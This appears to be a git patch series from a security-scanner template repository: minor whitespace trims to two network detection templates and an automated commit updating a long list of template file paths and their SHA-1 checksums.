a/network/vsftpd-backdoor.yaml +++ b/network/vsftpd-backdoor.yaml @@ -28,5 +28,3 @@ tcp: - type: word words: - "vsFTPd 2.3.4" - - diff --git a/network/vulnerabilities/clockwatch-enterprise-rce.yaml b/network/vulnerabilities/clockwatch-enterprise-rce.yaml index 4a91935ccd..3418380f5f 100644 --- a/network/vulnerabilities/clockwatch-enterprise-rce.yaml +++ b/network/vulnerabilities/clockwatch-enterprise-rce.yaml @@ -35,5 +35,3 @@ tcp: - type: word words: - "OK-C" - - From 70794ef9dfd47dcd17ecdc8979c8ff0267d0d7eb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:31:21 +0000 Subject: [PATCH 502/609] Auto Generated Templates Checksum [Fri Jul 7 11:31:21 UTC 2023] :robot: --- templates-checksum.txt | 8262 ++++++++++++++++++++-------------------- 1 file changed, 4131 insertions(+), 4131 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3fa3ff894e..582360e37c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8,27 +8,27 @@ TEMPLATES-STATS.json:b322c9ba292e0298b561b25a8950e989c4b50787 TEMPLATES-STATS.md:a53dea26d4e3da65292a159ecd28b58abe0f6f3a TOP-10.md:f96c096252794274c196f158e78053e036412447 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:ebc6bb54326fc16c8814990d72194a90967dd802 -cves.json-checksum.txt:9c59556216b6dc733ef76e2bf39faa8babce4dee -dns/azure-takeover-detection.yaml:90ea816357526ee7c170731114de8fc0a2357a27 +cves.json:84b562fb5aaa54405334753d9224c53d4d0745d9 +cves.json-checksum.txt:73b1d3e2dab71403691dc766cbf795cfd0a12ecb +dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161 dns/cname-fingerprint.yaml:f7200ff1f3b3f96a7a92ddd6b49e5e5abe1d2377 dns/cname-service.yaml:8b4716105619fadac741b19c60c682cf0576e927 -dns/detect-dangling-cname.yaml:1a886981ae636afd1f8e3e475123efba0b456053 -dns/dmarc-detect.yaml:bf8de471bc23a5239d8be1e85eae48d66ce2bffd -dns/dns-waf-detect.yaml:ce4f83bd478e2358c44fcd0ccc9562970f5d7421 -dns/dnssec-detection.yaml:502eb28a92385ab3fcb5ce47424705a3f44f890f -dns/ec2-detection.yaml:0df7d73d85d6961aaa3906ef5b489f622b014d9f -dns/elasticbeantalk-takeover.yaml:70e4170c8b7faa55d1ba500113b9d74d0593043c -dns/mx-fingerprint.yaml:52050cd11d03c6b624e24c14212a4272ad95af43 -dns/mx-service-detector.yaml:a973da2c53aafab6bea1d92bac872f3b9f53c7d5 -dns/nameserver-fingerprint.yaml:b00120f337328bc4239a66c9ce561508259cad0d -dns/ptr-fingerprint.yaml:d3fd3f1f627516adf1e35741bc71bef0d3998d30 -dns/servfail-refused-hosts.yaml:999708066bb1675ee4ad9e55821a1fd684e84a03 -dns/spoofable-spf-records-ptr.yaml:09283bd4f3b221485e892a4a3f223328013b91aa -dns/txt-fingerprint.yaml:f0f06788b607e47008a5893b4c5cb5781deb8122 -dns/worksites-detection.yaml:abd1995e754453518918136def84613ab5ec9fd0 -file/android/adb-backup-enabled.yaml:a8cfed2c07ecff061bfbc60a61ba20c9d4a08eb2 +dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c +dns/dmarc-detect.yaml:d6d23a8837c5ec3809ffa2d407a72fdc7a071671 +dns/dns-waf-detect.yaml:f4d80afe7d48cee91123294482cd63cadeaa943d +dns/dnssec-detection.yaml:6dd2e7d114f3be862e2f1e87f5d2d2c4de1bf08a +dns/ec2-detection.yaml:01823f3399c471516137b067f37f5c6661ae3099 +dns/elasticbeantalk-takeover.yaml:508aa4773710d1d6377a0f2364a28ec918584cb0 +dns/mx-fingerprint.yaml:191e425d8cad1d504d8f7ca3b19914cfd77ebb7b +dns/mx-service-detector.yaml:30d6bf3fec86d54f93a83438afe8595aff572212 +dns/nameserver-fingerprint.yaml:73093f4b321ce7b50e4f1cd0b16b037beb85b008 +dns/ptr-fingerprint.yaml:8a0953acfeb9384460c4f3ac0b463a0b42370529 +dns/servfail-refused-hosts.yaml:28e8b71907bbf6bb931e051696cd1c0a5adc3199 +dns/spoofable-spf-records-ptr.yaml:09cc066be755115a6cf01a5c810c55bf896f34e1 +dns/txt-fingerprint.yaml:23a6fa89c5e01dbe3d002b155924cfd87407b933 +dns/worksites-detection.yaml:b257c6733a9668de61c96e2e49f587c40ec84ed3 +file/android/adb-backup-enabled.yaml:735fd5eb61df164d28eabae76048be9487fb2443 file/android/biometric-detect.yaml:70f5e2dda35223782c5fbab51b93f620605201b0 file/android/certificate-validation.yaml:919b1e2709d9fae9e71a5261b1497219aa260881 file/android/content-scheme.yaml:481102dbb1025bb583f2d9ee96f916185fd5d0f5 @@ -65,7 +65,7 @@ file/audit/pfsense/password-protected-consolemenu.yaml:cec0a784fff726550393f8384 file/audit/pfsense/set-hostname.yaml:89464979b6b187293fca1d14e694c6d92d513a82 file/bash/bash-scanner.yaml:34c81ff693760add86b161184ca4ef55535d4ba6 file/electron/electron-version-detect.yaml:48a02ecd612fea69e5463adf12090cac7827cf5f -file/electron/node-integration-enabled.yaml:3de6b8cc228cb5cb4d806317982aeebb49d0c4b7 +file/electron/node-integration-enabled.yaml:733a153d6281bcbddc3bf705ce0831f2caf7e3c8 file/js/js-analyse.yaml:a6147fffd63f593695966ef2bc8c188ecc2be9e8 file/keys/adafruit-key.yaml:a66ee5e3ad5b40308b9206b25d117e373abff060 file/keys/adobe/adobe-client.yaml:57ca527417d5eed1d8f7d9f62678fbd84258002e @@ -152,10 +152,10 @@ file/keys/twilio-api.yaml:5ea16764819395bcfe307964c1b32a4dea86bb13 file/keys/twitter-secret.yaml:fa82d681ae94b741b25786f58835c9be605d8592 file/keys/zapier-webhook.yaml:48526eeb6c83d543a5bd7a9e160231dbb3112474 file/logs/django-framework-exceptions.yaml:bfe8762092b34fbe7c57d1d4f18116be8502ec58 -file/logs/python-app-sql-exceptions.yaml:f9bc92aea698954c325c8073098c7abc78549066 +file/logs/python-app-sql-exceptions.yaml:7dc14b83b6bf6cfa63af6a1ea1739a02d9b8394a file/logs/ruby-on-rails-framework-exceptions.yaml:4cacd8d7144f8353b5927cac2d008c1d08bb3a50 file/logs/spring-framework-exceptions.yaml:59912aa3db6ff6d29783c9b4fd84a6dc4d8369f3 -file/logs/suspicious-sql-error-messages.yaml:86d8b6802e5a2db1bee5759e412c63d99fc42a94 +file/logs/suspicious-sql-error-messages.yaml:2e4c653f2d2012480e5fcd8f964c114e5a26e5a9 file/nodejs/admzip-path-overwrite.yaml:3f7f79845877828f87e72b81326e6a90049bd8ea file/nodejs/express-lfr.yaml:cec2babe3b1d46416ec358ed00a5cea450531c13 file/nodejs/generic-path-traversal.yaml:49895d260bb6da86bd36dde6553265963cc62db0 @@ -169,16 +169,16 @@ file/python/python-scanner.yaml:3774742345a3c2db504ab69a5a4f2e2584bb5ed3 file/webshell/asp-webshell.yaml:b0284098b274456c7e028cb788afd9bd26bc30ae file/webshell/jsp-webshell.yaml:4c5f4d1c414c8b7fba63db4651565ec747b3b015 file/webshell/php-webshell.yaml:c33fb686c46b8211a18eaae52f0444bb73a107f2 -file/xss/dom-xss.yaml:bed2f678fd0c27367a30d1cc2279ba3f863e52b5 +file/xss/dom-xss.yaml:bb3cdfdfcbdf7e6a0e232a404a55437aa5d0b7c1 headless/dvwa-headless-automatic-login.yaml:99a6c2734ab061798627d79fda8ee538aa6060a8 headless/extract-urls.yaml:c2ff7a092991c2dee191e84ba4129270aacc8914 -headless/headless-open-redirect.yaml:001152420e1bc1f78b9263353f48db9dca6a023c +headless/headless-open-redirect.yaml:6f06b7fa102ab504a020c5e694fc0097c85ae845 headless/postmessage-outgoing-tracker.yaml:38d7ea38b0521a7ee3cf78db660b5ae923d1a54e headless/postmessage-tracker.yaml:bf39bc73b73f1bf0636383612db9fce761356c5e headless/prototype-pollution-check.yaml:c85aa05e1a2c587844f9566e736b4ba2d3adab9f headless/screenshot.yaml:1585b66950685872280283ade0edded290564340 headless/technologies/sap-spartacus.yaml:f2f2a580fbb037bdca1c90d7297892128bae9da5 -headless/window-name-domxss.yaml:a72a04f1d69f180e284e3a9fb68d1baa6eeaab4a +headless/window-name-domxss.yaml:5bd4634abe5103ab0b60740d28c1763545a40f0a helpers/payloads/CVE-2020-5776.csv:bb017fe08ae985c23145f7b69aab97cdffbbd8aa helpers/payloads/command-injection.txt:409a63a78f9f5a463437042971912fa06e4135bd helpers/payloads/request-headers.txt:b85d7c53290237323b5374416fbec07237941aa9 @@ -402,32 +402,32 @@ helpers/wordpress/plugins/wpvivid-backuprestore.txt:83a35ac526394e5168b118d107d8 helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:c1561cd7b973a41baaf95516c020fd65e8656f28 http/cnvd/2017/CNVD-2017-03561.yaml:74103420668209b795d1397008e67affd3e0856c -http/cnvd/2018/CNVD-2018-13393.yaml:13b1a2ac4e1ec4b1ef4bdad396ee00e2c6a43269 -http/cnvd/2019/CNVD-2019-01348.yaml:1e372017ae1710cbd85791f9b0a925bf03573f8c -http/cnvd/2019/CNVD-2019-06255.yaml:b4093de7ac8d55f5cb6b1dd5264a735d39c1e0e6 -http/cnvd/2019/CNVD-2019-19299.yaml:4a0897cc2289cb5fd333cdbb89829f9680626665 -http/cnvd/2019/CNVD-2019-32204.yaml:49b5bb22bdb572b3266fe0cf85c7bcb370e913e7 -http/cnvd/2020/CNVD-2020-23735.yaml:051a8db08bf00bd873efbc500d3e573c82ae5013 -http/cnvd/2020/CNVD-2020-26585.yaml:8aacad7ec4ad79c44c33e709418d9e077f480acc -http/cnvd/2020/CNVD-2020-46552.yaml:899c828473c63acbec7e1999a50a434b04548bf9 -http/cnvd/2020/CNVD-2020-56167.yaml:8a43ffb8415ad476eeb3b516069511c16b98b264 -http/cnvd/2020/CNVD-2020-62422.yaml:4d7fa34989bc5b9af2af28e81ed17a26b2e86db3 +http/cnvd/2018/CNVD-2018-13393.yaml:b936c60ce1fa7cd38b10597e9038dcb05692bf7c +http/cnvd/2019/CNVD-2019-01348.yaml:4bef313f2d9d68a895af773006cc2fe7de376b7b +http/cnvd/2019/CNVD-2019-06255.yaml:89f70d08a4c61f8c89535140381c4184626ca371 +http/cnvd/2019/CNVD-2019-19299.yaml:a622ec21bdb1ee06411960843f471dc9e170b960 +http/cnvd/2019/CNVD-2019-32204.yaml:fa3186408d0a902bcc62cac066453da38ca0c643 +http/cnvd/2020/CNVD-2020-23735.yaml:1a0787f1c8d99f31bd88c355153de31c00795edf +http/cnvd/2020/CNVD-2020-26585.yaml:71578bb817cafdb0e87d4f28cda841ffbc8c3f32 +http/cnvd/2020/CNVD-2020-46552.yaml:07ea9acd80bf0e367e25842f31a658595249aa08 +http/cnvd/2020/CNVD-2020-56167.yaml:badec400104a1b9d7c090891cd06a8d930b2f340 +http/cnvd/2020/CNVD-2020-62422.yaml:39f09d38d49dd0a4dc3cf941fdb2dade7375e3c2 http/cnvd/2020/CNVD-2020-63964.yaml:c80ab1148d417f0566d0bcb096409bfed16c3e2e -http/cnvd/2020/CNVD-2020-67113.yaml:9fd7ec8d5f122e7ddc8ed3028904453f63f14c56 -http/cnvd/2020/CNVD-2020-68596.yaml:a69cd9606bc087c09df887bce1be7933cf7b6d4a -http/cnvd/2021/CNVD-2021-01931.yaml:e03061f4ec928b5c409f335546b36825fc1b357c -http/cnvd/2021/CNVD-2021-09650.yaml:3462fa4141194d9a46a0b629f96acd532aec944c -http/cnvd/2021/CNVD-2021-10543.yaml:82784a860964c923901b642a4d4db2c4ff99d2b6 -http/cnvd/2021/CNVD-2021-14536.yaml:e728158c5b0a35e780e6764042713005df5075fd -http/cnvd/2021/CNVD-2021-15822.yaml:8be6f15f28d74bf4faf19e0585cd01ed11754abd -http/cnvd/2021/CNVD-2021-15824.yaml:ba456247ac7817d7c744def58758652e73828eb5 -http/cnvd/2021/CNVD-2021-17369.yaml:8f06d73d4c7149d46a6d58bd70892041cb191375 -http/cnvd/2021/CNVD-2021-26422.yaml:524f6f4c9cdf01d4a9016da7ea234e20f2fccad2 -http/cnvd/2021/CNVD-2021-28277.yaml:b482d3560a31f18818f2b1d8d74d64794aa90469 -http/cnvd/2021/CNVD-2021-30167.yaml:0a37c18c7e821a488af40928c89a01a2ad1ee490 -http/cnvd/2021/CNVD-2021-49104.yaml:3a25d729d314817f0c9144d7d39a85558b7264dc -http/cnvd/2022/CNVD-2022-03672.yaml:694ee5fd18f112ebb2d636c66ce01beaac4286bb -http/cnvd/2022/CNVD-2022-42853.yaml:3dae45e305a5f66a69ecc0cb1ccf4d963b29ccb5 +http/cnvd/2020/CNVD-2020-67113.yaml:125380bb3846086007f7d7521094f7aec17d73df +http/cnvd/2020/CNVD-2020-68596.yaml:aa47080fb9eb81f2dee9dbdfac915bfe1b856f9b +http/cnvd/2021/CNVD-2021-01931.yaml:ec84a4fb254c5750134cb1a6c5b5ec0c7e591b86 +http/cnvd/2021/CNVD-2021-09650.yaml:8ab65c5b630b867bf38133463df206892c92e156 +http/cnvd/2021/CNVD-2021-10543.yaml:82901afd8b28bf10c38eba7ea93bae350457d73b +http/cnvd/2021/CNVD-2021-14536.yaml:5decf87ca7f57a202c9c9d0d80a63a7f0970a8b6 +http/cnvd/2021/CNVD-2021-15822.yaml:d6c06f0b1dfafbe22f3f873989f42a51d463f9a4 +http/cnvd/2021/CNVD-2021-15824.yaml:667cb31a789ee9fcd4251c1fe78f8f800595f659 +http/cnvd/2021/CNVD-2021-17369.yaml:65beb26738c0a7a0b7ac10a854f9fd6650ccc084 +http/cnvd/2021/CNVD-2021-26422.yaml:7aaf1149908731caaa93d8e0fb1e0eca9530051c +http/cnvd/2021/CNVD-2021-28277.yaml:524a90b6c3bf5c2bb0b4dd821d384f1f98c80765 +http/cnvd/2021/CNVD-2021-30167.yaml:4eb3fbb771c370b1e9d8f31b76c3b79a892779dc +http/cnvd/2021/CNVD-2021-49104.yaml:e676d4620da1cd57bc021c49d3d7c7821eada127 +http/cnvd/2022/CNVD-2022-03672.yaml:e10e6a3a8c0c9527e640fcca1655186f039ce3e9 +http/cnvd/2022/CNVD-2022-42853.yaml:b09d41d36a02b364b40898c724386b30d575af2f http/cnvd/2022/CNVD-2022-86535.yaml:9dd03071fc9795f7ae4d99c59b3fd5342f5a5c70 http/cnvd/2023/CNVD-2023-12632.yaml:ceb1220ec85f8ba6607052d3ab2c9be79bd1a429 http/credential-stuffing/README.md:88a738a7af33e930f046a6681114389b2f341fa2 @@ -445,1572 +445,1572 @@ http/credential-stuffing/cloud/pulmi-login-check.yaml:02e294ce7b26d5732d8fc396fc http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml:a5c13b905ce766747d75254fb82d122c8bbbe70d http/credential-stuffing/self-hosted/grafana-login-check.yaml:3a3891cc6d5dcf12b812bc128a41388883bccc48 http/credential-stuffing/self-hosted/jira-login-check.yaml:906c5a83678bc47a75c5aa5a32925b70d24b804e -http/cves/2000/CVE-2000-0114.yaml:af678de88ba0c25c5c699691cbbca26e655ca74c +http/cves/2000/CVE-2000-0114.yaml:8f595d2c955bbb71f4e70547ee02fb5ebfb8b3e2 http/cves/2001/CVE-2001-0537.yaml:1bf2cb96b4bf92aca46e615725f17d6ba7ec185c -http/cves/2002/CVE-2002-1131.yaml:ea67e639e7bbc2c8145242b6fdff303688113115 -http/cves/2004/CVE-2004-0519.yaml:df333316e5285784c041ca82bba6a73d0fa79a96 +http/cves/2002/CVE-2002-1131.yaml:113ab5a317a4ac2e0094c9d5a1d40456807c8cfa +http/cves/2004/CVE-2004-0519.yaml:4dbea08a28a877490a90d401d5988b93c02038f9 http/cves/2004/CVE-2004-1965.yaml:4f029cd743345b0828e644bfe22f5cdb2c6289b7 -http/cves/2005/CVE-2005-2428.yaml:246bbf6fb03f076ff779630bd1c4106232960ad0 -http/cves/2005/CVE-2005-3344.yaml:27591d453e9dc2578217bad7e4c3887a7e1c76dc +http/cves/2005/CVE-2005-2428.yaml:a79eddfaef3da36e566211342e4ff038806338ed +http/cves/2005/CVE-2005-3344.yaml:004a762cc20685fd05479ed6239e36ea363eb4ab http/cves/2005/CVE-2005-3634.yaml:53e4a0f21eae5baa81512fff86c6e46345616a01 -http/cves/2005/CVE-2005-4385.yaml:0d55934f993ecd80e2b199f6a77e58a97a01a4fe -http/cves/2006/CVE-2006-1681.yaml:3a7253abdb750a50667cbc08877b1cf783512ee6 -http/cves/2006/CVE-2006-2842.yaml:01bcba15762fb5c7203964229caaaa35fbc94a9d -http/cves/2007/CVE-2007-0885.yaml:4aa199f80d6c4ebe0f8a6d506e367204c91d1c38 -http/cves/2007/CVE-2007-4504.yaml:3aa009b2aa6d6f8c88c75e9913e8c71fd0aa52ae -http/cves/2007/CVE-2007-4556.yaml:00f65f65420e1bb6e6bb2bfa4e20a2f4ad3c1e2f -http/cves/2007/CVE-2007-5728.yaml:d4b5c685a578ccb18aac5d7b8aa0893a54c846c5 -http/cves/2008/CVE-2008-1059.yaml:e49a7f072cbaaf9148dc9b9b150fd59b54556b23 -http/cves/2008/CVE-2008-1061.yaml:a7adad31bcbf40df1e5d7c46f44a4b8afc9611c8 +http/cves/2005/CVE-2005-4385.yaml:599e1520f3fada80a8d1609762a55a1d3d3c2655 +http/cves/2006/CVE-2006-1681.yaml:4e49b0838639bf0ea0ce228db6f18ae520d08191 +http/cves/2006/CVE-2006-2842.yaml:a64dc28160a84c4755405b9ef22c9934b461ac8d +http/cves/2007/CVE-2007-0885.yaml:8aa83adc6ddae52e1dbed85e3f60d990b14567c8 +http/cves/2007/CVE-2007-4504.yaml:6aa292768fc5bdedaa6febabd216e9608fe5ace1 +http/cves/2007/CVE-2007-4556.yaml:b8b0133b9f98b059d12930cf9b61664c6d939312 +http/cves/2007/CVE-2007-5728.yaml:9358c7a6dbb9e62c8acdc0c59cd2a6ca83365fbf +http/cves/2008/CVE-2008-1059.yaml:e1e878d9e7edbcb78e7ce134d7dee02e7c042222 +http/cves/2008/CVE-2008-1061.yaml:15e94a56afa304af2f00d6e3c07a49e51c91a8b6 http/cves/2008/CVE-2008-1547.yaml:2a3bc4a7106f28fe7b9c1deb736327478960980c -http/cves/2008/CVE-2008-2398.yaml:1a43c9b37f69b7d0003b94b0ed1bfa175bdf0631 -http/cves/2008/CVE-2008-2650.yaml:73108bb81468e3390f929fc6accac1e661b2d434 -http/cves/2008/CVE-2008-4668.yaml:42ff6ba0c3ba7bfc0542c3d4f8b67be8f86e6308 -http/cves/2008/CVE-2008-4764.yaml:21863f2444665c051e325cfd2641bdf020a53037 -http/cves/2008/CVE-2008-5587.yaml:0064119c38ba31d680ed982f9fc27df805c422f9 -http/cves/2008/CVE-2008-6080.yaml:b7aef675781219d20a93dfafd5cf478e8b72e76f -http/cves/2008/CVE-2008-6172.yaml:3e05ffe9c7c5732f96675f67c6c294e674fee836 -http/cves/2008/CVE-2008-6222.yaml:5de91170b6439122e58225af81131f02b1c4842c -http/cves/2008/CVE-2008-6465.yaml:047c61f0390ce5fe9d4aac4a6c088f8e7a59a7b6 -http/cves/2008/CVE-2008-6668.yaml:8dce860ee2b4e5ca9852d805b2ec3cad491760e9 -http/cves/2008/CVE-2008-6982.yaml:77f158133db7dfd77fcee56de869a780388afd5e +http/cves/2008/CVE-2008-2398.yaml:3704f2f23f01329df892a136256f25401307b70e +http/cves/2008/CVE-2008-2650.yaml:339f29809b53a3ed67a7af8cea4ad5d62abf1145 +http/cves/2008/CVE-2008-4668.yaml:4f50aee1c3a02be4a6f33b2db22ab773e62ce391 +http/cves/2008/CVE-2008-4764.yaml:3c7501986b8972a8d2ff6955f0a84966f73beaa6 +http/cves/2008/CVE-2008-5587.yaml:bc44d9bd50432c08c1915d5165bf8cc559ff93aa +http/cves/2008/CVE-2008-6080.yaml:75b7e7e1ad4f7dc3a68a1fe9e4030376726da041 +http/cves/2008/CVE-2008-6172.yaml:ad333a4498cf6bc26d60895da58bc8eb1f2057f4 +http/cves/2008/CVE-2008-6222.yaml:bbe8bd2dd9468c551481935536f76253abfc54f7 +http/cves/2008/CVE-2008-6465.yaml:3f8b9de80ce1ad1b1b655198a5f3fc2456412e20 +http/cves/2008/CVE-2008-6668.yaml:dd7bc3a095ea1a85d02d04b72295a315aca3cc53 +http/cves/2008/CVE-2008-6982.yaml:e29af082fa42eadd822aa72e1e2a7624594f939e http/cves/2008/CVE-2008-7269.yaml:9a878eba6d70e29779c398b82795fdd8b1aa2aac http/cves/2009/CVE-2009-0347.yaml:94cac75ae859d1033eb7b721e11996594e40b0e0 -http/cves/2009/CVE-2009-0545.yaml:cef5f8cd142a53290d9b58aecc4150db3fa5d332 -http/cves/2009/CVE-2009-0932.yaml:e1d62d90e53e4550fdd04c273641d95f1d197e16 -http/cves/2009/CVE-2009-1151.yaml:1ec744b13396209554f17cb6634411779af0efd7 -http/cves/2009/CVE-2009-1496.yaml:714f2ea5f5b9aa52ba0e386ca0113b50a968fa52 -http/cves/2009/CVE-2009-1558.yaml:d4330910a9029dd910c04283161dc58fce6a6342 -http/cves/2009/CVE-2009-1872.yaml:5e880dd876dd2eb940b5c1abe0123d6054cd7092 -http/cves/2009/CVE-2009-2015.yaml:eadabbf3e350d5830bce6f033d147966cce16519 -http/cves/2009/CVE-2009-2100.yaml:a2c9cf4e266ddaef644bfdc218573c347ee12913 -http/cves/2009/CVE-2009-3053.yaml:b585c44e8935c695cd1ef4d53678aa6360b3591d -http/cves/2009/CVE-2009-3318.yaml:4190da833fedd0b9a8bb29cdfc57f08ad68d5a42 -http/cves/2009/CVE-2009-4202.yaml:4d6ac097bfa42a62b0cf7f0e30a1be7d270c52f2 -http/cves/2009/CVE-2009-4223.yaml:cba5bfad765e4940c899861474da1a39c50592af -http/cves/2009/CVE-2009-4679.yaml:82f07c46e69add82ce4bb54aef3a8c509e8cfed2 -http/cves/2009/CVE-2009-5020.yaml:1a254e69a575d54d5e21ff492836d25b312cac2d -http/cves/2009/CVE-2009-5114.yaml:a74ce2fe9575dc092701b1d31d7b34cc34e478cd -http/cves/2010/CVE-2010-0157.yaml:9992d9e1df2b0123a108b0c6ebb1ef916b1fadf3 -http/cves/2010/CVE-2010-0219.yaml:8d2c52839434411b6dd523fc5199c29104594831 -http/cves/2010/CVE-2010-0467.yaml:1c3ff0caf1925b2993d99eefc857c9b48a4401c9 -http/cves/2010/CVE-2010-0696.yaml:db6275c4ee2d42ddea32708f875fd90e31d1a62a -http/cves/2010/CVE-2010-0759.yaml:a7c1cded985d1dcc428a770b07f66ca94cab5ef1 -http/cves/2010/CVE-2010-0942.yaml:25339672748b422104cd63703a3bebdd73859d9b -http/cves/2010/CVE-2010-0943.yaml:5c9400ab9a364c5650d63e25a145d9ec7c5da5e5 -http/cves/2010/CVE-2010-0944.yaml:0cff059cbce930ee7de5f374e7dc6c7a8787d40e -http/cves/2010/CVE-2010-0972.yaml:c54c96af2658b051b83b0bb4ec7f44765d287b1e -http/cves/2010/CVE-2010-0982.yaml:b6211a4463e8f1a4ef4518a07dee7876272ef3cc -http/cves/2010/CVE-2010-0985.yaml:46ade2dfcfb168313ac12109d17b055d6e73744b -http/cves/2010/CVE-2010-1056.yaml:7e9a9ee0beed7aab2dc13f51840872c5e27167b9 -http/cves/2010/CVE-2010-1081.yaml:bd64bb01f75b40a6554f67838b2f1f8232aa54f9 -http/cves/2010/CVE-2010-1217.yaml:a8e750b52054afc7057e4682a414e49ec7332c03 -http/cves/2010/CVE-2010-1219.yaml:c1fb16f6f531e2c87e83dafe5b1319af5d0d7aa5 -http/cves/2010/CVE-2010-1302.yaml:27a0c5f658065f9732da13516ddc27473f524bb5 -http/cves/2010/CVE-2010-1304.yaml:1eef9081454f81bc90993393540cdac5168e7b66 -http/cves/2010/CVE-2010-1305.yaml:b59c7f91c0c318cc38539fe007f187cfb769e1bc -http/cves/2010/CVE-2010-1306.yaml:b6f480c8143b7b36d5466ed69b24f7a83aef319b -http/cves/2010/CVE-2010-1307.yaml:123eba8c557b9866293fe966ea416dc018f57c1a -http/cves/2010/CVE-2010-1308.yaml:99e70f863d25a78314db2c811dccc8f417867d42 -http/cves/2010/CVE-2010-1312.yaml:6d1f3facfe78a3389307ad0cc4ad2918229e2ab4 -http/cves/2010/CVE-2010-1313.yaml:d72cb982ccb1b0f97150277df02e67c42c11d890 -http/cves/2010/CVE-2010-1314.yaml:e8833431dc0e2047cd4d90a9cb77b7b9ece2a0b1 -http/cves/2010/CVE-2010-1315.yaml:8fd04f4f98ff69607029570c8fa1774bd86939fe -http/cves/2010/CVE-2010-1340.yaml:1dae961b1b17bdf95fde62593c7406518f989f81 -http/cves/2010/CVE-2010-1345.yaml:834810b109e87700aef0c12d69aa15cf46ea33f6 -http/cves/2010/CVE-2010-1352.yaml:2130033f1ffcead48fed8820b0877a66a8fd985a -http/cves/2010/CVE-2010-1353.yaml:253ab02b27243dd19a4fa3c1d383050ac1bfe318 -http/cves/2010/CVE-2010-1354.yaml:f10d27209e6cb2f399f107be61a3efdec39944b4 -http/cves/2010/CVE-2010-1429.yaml:ba757fbab014c40df9857a52a16c1925f357fcfd -http/cves/2010/CVE-2010-1461.yaml:1995c09fba6f35087ee6cf2987806c1598e8ebba -http/cves/2010/CVE-2010-1469.yaml:d090c61a4b0090783105c2000faab269faffcd9a -http/cves/2010/CVE-2010-1470.yaml:5cc76c9ad0a37438a4830a62edb7537dd9340aa0 -http/cves/2010/CVE-2010-1471.yaml:531ab742d88618ad2281c7b5f6574147261aba9f -http/cves/2010/CVE-2010-1472.yaml:c0a6fc7713e5fee48549d90b8acacf50ea3eaa68 -http/cves/2010/CVE-2010-1473.yaml:4b34cbc91b966b40f622c5f0ee27172753b2e6b4 -http/cves/2010/CVE-2010-1474.yaml:7e4a2bb4ce54e33014955847b9af99cd7f308f10 -http/cves/2010/CVE-2010-1475.yaml:1f0c8b62fdbe95835e46936aa13083e496c5fe14 -http/cves/2010/CVE-2010-1476.yaml:5ff65878030fac4dd408aa9ca0adb243146c9d1b -http/cves/2010/CVE-2010-1478.yaml:07eb54aac8d4e1332757ca0bd5ae165e4fbe0a04 -http/cves/2010/CVE-2010-1491.yaml:36012bd9049973183e0fd89ea19c8ce2a9192230 -http/cves/2010/CVE-2010-1494.yaml:023d33aed3a916878be320491e00095c70d4d3f9 -http/cves/2010/CVE-2010-1495.yaml:093a3e1ea6303aa3491f00af64af6139b5007ddb -http/cves/2010/CVE-2010-1531.yaml:12a90e2f660096681fa0ccce1abf9c19721acfbb -http/cves/2010/CVE-2010-1532.yaml:d107a1d10a80ee870c6497deb1e86641b31eed56 -http/cves/2010/CVE-2010-1533.yaml:27870f9227b6f5fbc05afb1df8d0d696f1aa3ab6 -http/cves/2010/CVE-2010-1534.yaml:2889adb4ea47f256b32c22ff3ff887d147e5c132 -http/cves/2010/CVE-2010-1535.yaml:f344369c4b7e5905e00a5aec0899ca69738f8f3e -http/cves/2010/CVE-2010-1540.yaml:707bd6cb58dae711f2ae1871436179fa99a24380 +http/cves/2009/CVE-2009-0545.yaml:a1e1afb3d6740f0e5706e3fbc76a9a87b479b4d6 +http/cves/2009/CVE-2009-0932.yaml:aa290be3045c2720db8db4d709403ca678574053 +http/cves/2009/CVE-2009-1151.yaml:b851b880b5a363f29ed597712ab3559bb2ff40a1 +http/cves/2009/CVE-2009-1496.yaml:60c4d7f39742f16734c846f60e3d91b775f32628 +http/cves/2009/CVE-2009-1558.yaml:038465f835e784a4bb49409fbfc845a49ac7665d +http/cves/2009/CVE-2009-1872.yaml:4df321d39d0e02ced65ea3e7cde30066b4e5b03a +http/cves/2009/CVE-2009-2015.yaml:f0d806d0ae75589469e31aa89d1251c575b41cad +http/cves/2009/CVE-2009-2100.yaml:d85152cbb8e6fb1bac8210bb70dd9cc4fba688ae +http/cves/2009/CVE-2009-3053.yaml:d26fac29688d26e4fff2f6b9680203cc4de8a9e5 +http/cves/2009/CVE-2009-3318.yaml:42d002cae9c42635a04598834e024801ebf9616f +http/cves/2009/CVE-2009-4202.yaml:a345669aabdf60e7ea8d524a78cff1f6b9f1570a +http/cves/2009/CVE-2009-4223.yaml:d3bb678cbfff10dcc61aa6991f80569d50eea335 +http/cves/2009/CVE-2009-4679.yaml:809fb4950dd5b481579649b8a14a6071b3d1e7b7 +http/cves/2009/CVE-2009-5020.yaml:277a56a71bfedb286b40329f716755fd4a050ad4 +http/cves/2009/CVE-2009-5114.yaml:15f1a32c1679721b6f44b440ceee7526146b0f6b +http/cves/2010/CVE-2010-0157.yaml:4492c219dae1162c2bd63438711ee412fb6793e1 +http/cves/2010/CVE-2010-0219.yaml:7c1e39b4db671db2fada46dfdad4ae0f7f60d84f +http/cves/2010/CVE-2010-0467.yaml:ca70d0c2fe3d70cfe91c939d2960f80b4efe4a35 +http/cves/2010/CVE-2010-0696.yaml:105d1503c59daa7a73a8c628d2c48056bbef2657 +http/cves/2010/CVE-2010-0759.yaml:ee899da105703531dddba09a3107191212f8a690 +http/cves/2010/CVE-2010-0942.yaml:21a553ad68607364932f430fd63aecb920dfd2ff +http/cves/2010/CVE-2010-0943.yaml:2ac3243837b0c435ab1554db6f82c2ff3b8f5700 +http/cves/2010/CVE-2010-0944.yaml:7a8579aea1e8f0867132f903ae3d637e82b6b5ed +http/cves/2010/CVE-2010-0972.yaml:1a5011d7a8cc7e75031ffdfc7888ed10a5b2589c 